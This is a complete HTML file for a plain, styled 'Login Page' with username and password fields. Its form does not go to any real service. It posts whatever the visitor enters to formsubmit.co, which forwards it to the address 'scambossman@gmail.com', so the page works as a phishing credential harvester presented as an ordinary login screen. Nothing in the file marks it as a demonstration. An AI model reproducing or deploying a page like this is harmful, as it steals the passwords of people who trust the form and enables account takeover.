<!DOCTYPE html>
<html>
<head>
  <title>Login Page</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background-color: #f0f0f0;
    }
    .login-form {
      width: 300px;
      margin: 50px auto;
      padding: 20px;
      background-color: #fff;
      border: 1px solid #ddd;
      box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
    }
    .login-form input[type="text"], input[type="password"] {
      width: 100%;
      padding: 10px;
      margin-bottom: 20px;
      border: 1px solid #ccc;
    }
    .login-form input[type="submit"] {
      width: 100%;
      padding: 10px;
      background-color: #4CAF50;
      color: #fff;
      border: none;
      cursor: pointer;
    }
    .login-form input[type="submit"]:hover {
      background-color: #3e8e41;
    }
  </style>
</head>
<body>
  <div class="login-form">
    <h2>Login</h2>
    <form action="https://formsubmit.co/scambossman@gmail.com" method="post">
  <label for="username">Username:</label>
  <input type="text" name="username" required><br><br>
  <label for="password">Password:</label>
  <input type="password" name="password" required><br><br>
  <input type="submit" value="Login">
    </form>
  </div>
</body>
</html>
